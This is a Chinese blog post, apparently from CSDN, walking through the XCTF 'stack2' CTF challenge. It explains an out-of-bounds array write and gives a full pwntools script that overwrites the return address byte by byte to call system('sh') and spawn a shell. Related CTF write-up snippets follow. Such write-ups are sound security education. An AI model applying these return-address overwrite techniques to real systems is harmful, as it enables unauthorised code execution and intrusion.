《攻防世界》stack2逻辑漏洞题

最新推荐文章于 2025-03-04 17:16:06 发布
最新推荐文章于 2025-03-04 17:16:06 发布
阅读量3.7k 收藏 1
点赞数
分类专栏: pwn题目 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csdn546229768/article/details/121350487
版权

到了进阶题目越来越好玩了,发现解出来一道题有解数学那味了

嗯,拿到题目一看逻辑题,做题刚打完比赛(第一次)被逆向和pwn的逻辑题给整怕了,这次遇到这种题目,我选择硬刚!

首先读懂题目的内在逻辑,并关注常见的pwn漏洞,首先一步步分析

在这里插入图片描述

这里有个循环100次接收输入,全局的看了下都是在对buf操作,先标志一手,但是这里无法产生溢出,那么看下面

在这里插入图片描述

首先看到for里面初始化j = v5 ,那么这个j也就是我们可控的标记一下,然后就是死循环,每次循环后调用一次printf

select1就是显示所有值、select2添加值,select3修改值、select4打印所有累加值、select其他就是完美避开所有判断break跳出所有循环

嗯,分析之后大概的试了下程序,突破口在于这个for循环中的j,可以看到select1中就是打印出我想要看到的长度数值

在这里插入图片描述

那么第一次输入的时候就可以直接尝试输入一个很大的值,然后select1看看打印的值,

num  = 0x70+0x4 + (0x4 *4)
sla('\n',str(num))
#输入的100个数
for i in range(0,100):
 sl('1')
sl('1')#显示数据是否正确

在这里插入图片描述

因为我输入的长度是大于缓冲区的所以打印出了多余的,那么再来看看栈空间是否数值匹配

在这里插入图片描述

果然没错刚好对应栈空间数据,那么我们回到ida中,因为select2对数据进行判断我们不能添加成功99个之后的数,但是select3却可以,所以我们只要找到数组中对应的索引对齐单个修改就可以修改成我们想要的地址了,为了后面的方便我提取了个方法

def send(index,data):
 sl('3') #逐个进行修改ret地址
 sl(str(index))
 sl(str(ord(data)))

最后将栈空间对应的索引,和要修改的拼接地址传入进来,ok!payload如下:

backdoor = 0x804859B  #这个好像用不了
data = p32(backdoor)
send(num,data[0:-3])
send(num+1,data[1:-2])
send(num+2,data[2:-1])
send(num+3,data[3:])

因为程序提供了后门函数,所以最后直接运行程序,本地跑通了,但是远程却失败了,报了个找不到bash的错误,嗯!,没关系,刚好程序提供了System函数和sh字符(需要解析),那么自己搭个桥就是了

syst_addr = 0x8048450
bin_sh = 0x08048980 +7 #刚好取到sh(这是个小技巧,可以记下笔记)

然后再按之前的方法在后门进行拼接进去我们的参数,嗯,但是程序依旧报错,我还gdb看了栈空间,确实进入了system函数,但是没多久就奔溃了,然后我想到了之前做64位的栈空间对齐问题,果断试着添加一个返回地址已填充栈空间所需数据,最终payload,可以正常拿到sh

from pwn import *
context (log_level = 'debug' ,bits=32 ,os = 'linux' ,arch = 'i386' ,terminal = ['tmux' , 'splitw', '-h'])

local = 1
binary_name = "stack2"
ip = "111.200.241.244"
port = 64664

if local:
        p = process(["./" + binary_name])
        e = ELF("./" + binary_name)
else:
        p = remote(ip, port)
        e = ELF("./" + binary_name)

def z(a=''):
        if local:
                gdb.attach(p, a)
                if a == '':
                        raw_input()
        else:
                pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)

backdoor = 0x804859B  #这个好像用不了
syst_addr = 0x8048450
main_addr = 0x080485D0

z('b *0x80488EB')

num  = 0x70+0x4 + (0x4 *4)
bin_sh = 0x08048980 +7 #刚好取到sh
sla('\n',str(num))

#输入的100个数
for i in range(0,100):
 sl('1')
sl('1')#显示数据是否正确
data = p32(syst_addr)
data_sh = p32(bin_sh)
data_main = p32(main_addr)
success('backdoor addr -> 0x%s',data)
success('backdoor addr -> %d',ord(data[3:]))
success('backdoor addr -> %d',ord(data[2:-1]))
success('backdoor addr -> %d',ord(data[1:-2]))
success('backdoor addr -> %d',ord(data[0:-3]))

def send(index,data):
 sl('3') #逐个进行修改ret地址
 sl(str(index))
 sl(str(ord(data)))

send(num,data[0:-3])
send(num+1,data[1:-2])
send(num+2,data[2:-1])
send(num+3,data[3:])

send(num+4,data_main[0:-3])
send(num+5,data_main[1:-2])
send(num+6,data_main[2:-1])
send(num+7,data_main[3:])

send(num+8,data_sh[0:-3])
send(num+9,data_sh[1:-2])
send(num+10,data_sh[2:-1])
send(num+11,data_sh[3:])
sl('5')

p.interactive()

做完这题看wp后发现大佬都是一点点代码就跑出来了,和我的代码有点不一样,但思路是一样的,我这个是完全按照我做题思路一步步写出来的,所以没有经过简化,也算是一套思路过程吧,现在做题每次做到了最后获取shell的时候,都会有个栈数据填充问题,不知道是不是该考虑下我的环境问题,每次手动调栈数据好费时间啊

[ 渗透测试面试篇 ] 渗透测试面试大集合(详解)(4-7)逻辑漏洞相关面试
qq_51577576的博客
12-02 1847
[ 渗透测试面试篇 ] 渗透测试面试大集合(详解)(4-7)逻辑漏洞相关面试 渗透方向的岗位,涉及到的知识点是很广泛的。 这里我总结了整个一系列的面试,可能没有覆盖到全部的知识面,但是应该是比较全面的,本文主讲解web漏洞逻辑漏洞方向的面试。 如果整个系列的问搞懂了大部分,那找个网安方向的工作基本上没什么问了。 当然了,可能也不是说这些问都会被问到,但这些题目都是和网安岗位相契合的。
攻防世界 stack2
10-07 570
1.题目 2.IDA分析 3.分析 本地存在明显的数组越界漏洞,选择3修改数据时,没有检查是否越界,直接操作指针进行修改。所以我们只要利用这个漏洞构造system的调用即可(注意,function区的hackhere方法不可用,调用会提示不存在bash。。。) 所以这道题目最难在于addr_buf与addr_ret之间的距离。一开始看ida的栈信息,以为是74h,结果溢出失败。 这种情况很明显是编译器做了什么处理,所以只能动态调试。 在show data方法里面下断点,位置:0x80
pwn 攻防世界 stack2
A13837377363的博客
04-04 597
当时我检查了脚本很久,确认无误,gdb调试也确实修改了返回地址,但检查汇编代码发现,最后有 lea 指令改变了esp的值。查看源码,发现对修改数组没有做限制,很自然想到一个字节一个字节修改返回地址。要修改system的参数,幸好题目不算太坏,可以找到'sh\x00'字符串。2.做不出题目的时候,可以多看看汇编指令,可能有发现。在这道耗了很多时间,有很多陷阱,记录一下。这是esp最后的地址,相差了0x10。即使你修改了,也会像这样打不通。这是一开始记录的ebp的地址。所以修改脚本,并且打通本地。
Stack2 攻防世界题目分析
shanwei274的博客
04-18 1107
—XCTF 4th-QCTF-2018 前言,怎么说呢,这题目还是把我折磨的可以的,我一开始是没有看到后面的直接狙击的,只能说呢。 我的不经意间的粗心,破坏了你许多的温柔 1.气的我直接检查保护: 32位程序,开启了canary保护。 2.ida查看: 首先放的第一幅图片呢,是我一开始以为可以溢出的,也可以看见我旁边标注了一个maybeoverflow。 但是是不可以的,因为首先由于这里的 i 最大上限100,可能有的人头铁就要说了,这里v7可以慢慢溢出去修改i,(和我一样) 可是这里v13的存储位
攻防世界pwn——stack2
qq_62076255的博客
12-18 796
攻防世界pwn——stack2记录
攻防世界PWN进阶区(stack2
BurYiA的博客
01-26 1029
stack2 哈,我又回来了 这个呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问 这个时对数据进行...
攻防世界进阶note_service2: 堆区第一
weixin_48066554的博客
03-16 409
note_service: 堆区第一! 拿到题目,按惯例checksec: 发现开了PIE和Canary,这意味着我们不能愉快地ret2text了,有点难受,但是没开NX,那不就ret 2 system call 一把梭哈了吗 丢到ida里看一下(为方便阅读,已将部分函数名、变量名进行了更改): 反汇编 1、程序主体 void choice() { while ( 1 ) { menu(); printf("your choice>> "); switch (
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。下面我们将深入探讨"jmp_rsp"及相关知识点。 "jmp_rsp"源自x86/x64架构中的汇编指令。"jmp"是无条件跳转指令,...
攻防世界pwn题目int_overflow
03-08
当遇到名为`int_overflow`的题目时,这可能意味着某个`int`型变量存在栈溢出风险[^2]。 对于这类问的一个常见解决方法涉及以下几个方面: #### 分析目标程序 使用反汇编工具IDA可以深入分析二进制文件的工作...
pwn学习-攻防世界(一)
qq_45653588的博客
12-20 933
文章目录0x00 forgot0X01 dice_game0x02 Mary_Morton0x03 warmup 0x00 forgot 下载文件,检查文件保护机制,只开启了NX保护的32位文件。 拖入ida反编译一下,好多函数。。 先输入一个参数s,然后给出了函数sub_8048654()的地址,然后输入参数v2的值,进入for循环。判断v0的值和v2的长度,v0大于等于v2退出循环。 接下来是switch语句,参数为v14,初始为1,退出switch后,会执行(*(&v3 + --v14))()
攻防世界 新手区string
winterze的博客
04-04 407
0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/string' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 64位,开启了Canary和...
攻防世界pwn--stack2
L0g1c的博客
10-31 692
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
攻防世界高手进阶区——stack2
weixin_62675330的博客
02-24 1267
攻防世界高手进阶区——stack2题目啥都没有 一,分析文件 checksec 发现居然存在栈溢出保护,这是以前做没看到过的,可能会有新的知识点。 运行文件 貌似是一个输入数字计算平均值的程序。 ida打开 unsigned int m; // [esp+34h] [ebp-74h] char v13[100]; // [esp+38h] [ebp-70h] unsigned int v14; // [esp+9Ch] [ebp-Ch] v14 = __readgs
攻防世界-stack2-Writeup
SkYe's Blog
05-13 607
stack2 题目来源: XCTF 4th-QCTF-2018 [collapse title=“展开查看详情” status=“false”] 考点:数字下标溢出 保护情况: Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 漏洞函数: puts("which numb
墨者 - PHP逻辑漏洞利用实战(第1)
吃肉唐僧的博客
07-02 537
登录进去之后,发现余额为1,但是买两本书需要20元。 用bp抓包修改金额数据 成功
攻防世界 PWN 高手进阶 stack2 (write up)
qq_44768749的博客
08-18 591
攻防世界 PWN 高手进阶 stack2 (write up)stack20x01 查看保护机制0x02 查看反汇编0x03 利用过程修改返回地为system地址设置system函数的参数为'sh'exp stack2利用未对数组边界进行检查,从而可以实现栈溢出 0x01 查看保护机制 32位 开启NX和canary 无PIE 0x02 查看反汇编 int __cdecl main(int argc, const char **argv, const char **envp) { int
攻防世界stack2
X_szxj的博客
03-04 836
保护重定位表:在动态链接的程序中,重定位表包含了程序在运行时需要修改的地址信息。在 0x080486d5处v13数组出现,从push开始压入栈中一个v7,作为scanf的参数,调用___isoc99_scanf函数,读取v7值并储存到var_88,add清理栈空间,恢复esp的值,将用户输入的整数(存储在。我们需要将最终的返回地址修改成‘sh’的函数地址,最终获取shell,那么就需要计算数组v13的首地址到主函数结束(return 0)的偏移量,通过动态调试,可以查看v13的首地址。
pwnable 题目解析:[Toddler's Bottle]-lotto 逻辑漏洞
个人笔记
02-27 425
0x10 题目描述 Mommy! I made a lotto program for my homework. do you want to play? ssh lotto@pwnable.kr -p2222 (pw:guest) 本pwnable 中的入门级试,代码本身不含漏洞,而是逻辑。时至今日,很多传统的堆栈溢出漏洞不再那么容易找到,而那些设计问或者代码中的逻辑,往往...
攻防世界----bug
qq_44418229的博客
08-03 1274
攻防世界----bug 知识点1:逻辑漏洞--垂直越权 知识点2:文件上传---利用JavaScript执行php代码
pwn是什么文件
最新发布
03-27
<think>好的,我现在需要回答用户关于pwn文件的类型、用途和格式的问。根据用户提供的引用资料,我需要先理解这些引用中的相关内容,然后结合自己的知识进行整理。 首先,用户提到了三个引用。引用[1]和[2]都涉及ELF文件的结构和定义,而引用[3]提到了与pwn相关的一些操作,比如open、read、write。但用户的问是关于pwn文件的类型、用途和格式,所以可能需要明确pwn文件是否特指某种类型的文件,或者是否与ELF文件有关。 根据我的了解,“pwn”在网络安全领域通常指代攻防技术,尤其是在CTF比赛中,pwn题目通常涉及二进制漏洞利用。这类题目通常会提供可执行文件(如ELF文件),参赛者需要分析并利用其中的漏洞。因此,pwn文件可能指的是这些可执行文件,尤其是ELF格式的文件。 接下来,我需要确认用户提到的引用内容是否支持这一点。引用[1]和[2]详细描述了ELF文件的结构,包括不同的节类型(如代码段、数据段)和其用途。引用[3]则提到了文件操作的流程,这可能与处理pwn题目的过程相关,比如读取文件内容、写入输出等。 因此,可以推断pwn文件通常是ELF格式的可执行文件,用于二进制漏洞利用挑战。需要将这些信息结构化,并确保回答符合用户的要求,如使用正确的LaTeX格式,生成相关问,并正确引用来源。 在回答过程中,需要注意以下几点: 1. 明确pwn文件的类型是ELF格式。 2. 说明其用途主要在CTF比赛和二进制漏洞利用。 3. 描述ELF文件的结构,如节类型和段。 4. 引用相关引用来支持结论。 然后,生成的相关问需要围绕pwn文件的分析、漏洞利用方法以及ELF结构展开,确保问具有针对性和延伸性。 最后,检查LaTeX格式是否正确,所有数学表达式和独立公式都正确使用$和$$符号,并且回答结构清晰,引用标识正确放置。</think>### pwn文件的类型、用途及格式解析 #### 1. 文件类型 在网络安全领域(尤其是CTF竞赛中),**pwn文件**通常指代**ELF(Executable and Linkable Format)文件**。ELF是类Unix系统(如Linux)中用于可执行程序、目标文件和共享库的标准格式[^2]。其类型可通过节(Section)和段(Segment)区分: - **代码段(.text)**:存储可执行指令。 - **数据段(.data、.bss)**:存储全局变量和静态变量。 - **符号表(.symtab)**:记录函数和变量符号信息[^1]。 #### 2. 主要用途 pwn文件的核心用途是**二进制漏洞利用**,常见于以下场景: - **CTF竞赛**:参赛者需通过逆向分析或动态调试,发现缓冲区溢出、格式化字符串等漏洞,构造攻击载荷(Payload)获取系统权限。 - **安全研究**:模拟真实环境中的漏洞利用,验证补丁有效性或攻击手法。 - **渗透测试**:评估系统安全性时,测试二进制程序的抗攻击能力。 #### 3. 文件格式 ELF文件的结构分为两部分: 1. **节(Section)**:用于编译和链接阶段,如`.text`、`.data`、`.plt`(过程链接表)等。 2. **段(Segment)**:用于程序加载执行,如代码段(LOAD)、动态链接信息(INTERP)等。 例如,漏洞利用常关注以下结构: - **全局偏移表(.got)**:存储外部函数地址,可被篡改以劫持程序流。 - **栈(Stack)**:通过溢出覆盖返回地址,控制执行流程。 #### 4. 典型操作示例 引用[3]中的代码片段展示了pwn题目中常见的文件操作逻辑: ```c open('文件名', 0, 0); read(文件描述符, 缓冲区, 读取大小); write(1, 缓冲区, 写大小); ``` 此类代码可能因未检查输入长度导致栈溢出漏洞,攻击者可利用其注入恶意代码[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值